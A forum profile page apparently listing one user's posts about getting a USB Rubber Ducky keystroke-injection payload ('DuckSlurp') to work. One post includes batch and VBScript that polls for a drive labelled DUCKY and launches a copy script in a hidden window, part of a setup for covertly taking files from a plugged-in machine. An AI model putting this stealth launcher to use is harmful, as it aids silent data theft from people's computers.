Jump to content

Ezniks

Active Members
  • Posts

    5
  • Joined

  • Last visited

Posts posted by Ezniks

  1. Can someone make a quick video on 'How to Flash your USB Rubber Ducky to a ... Firmware (and back)'. I know there is already a guide on google code,but I just wanna be sure that I do nothing wrong with my little thingy.

    I'm also asking this because I can't install atmel flip signed drive (in fact none of the programs in the 'Duck Programming') and my pc can't find my ducky in DFU- mode.

    Mb kinda noob question or request, but I only got problems with my Duck and pc

    Greetz,

    Noob Ezniks

  2. Prefix every line with STRING, and re-encode,

    then open notepad, make sure it remains the active window, while inserting the Ducky.

    the Ducky should then start typing into notepad.

    This output will enable us to do some debugging!

    Also are you Windows or Linux the \ or / after "resources" might make a difference?

    Got the right "/" flag for Linux. ;) But I think there is something wrong with the brackets (due to keyboard properties?)

    duckywait.bat:

    :while1

    @echo off
    :while1
    for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
    if ]%DUCKYdrive%[ EQU ][ (
    timeout /t 3
    goto :while1
    ) else (
    goto :break
    )
    timeout /t 3
    goto :while1
    :break
    set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
    wscript.exe invis.vbs %DUCKYdrive%\DuckSlurp.bat
    Probably the brackets?
    And this for invis.vbs:
    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
    wscript.exe invis.vbs DuckyWait.bat
    EXIT
    CD %TEMP%
  3. Not working. :unsure:

    When I plug my ducky in, everything is going right, but it stops with 'EXIT' in the command prompt (stays there and command prompt doesnt go away).

    When I plug the flash drive 'DUCKY' in, he copies nothing and there's no new folder...

    When I execute the Duckslurp.bat, he creates a folder, but no files.

    To encode, I used this commandline: java -jar encoder.java -l resources/be.properties -i input_file.txt -o inject.bin (v.2.6)

    Plz help me out.

×
×
  • Create New...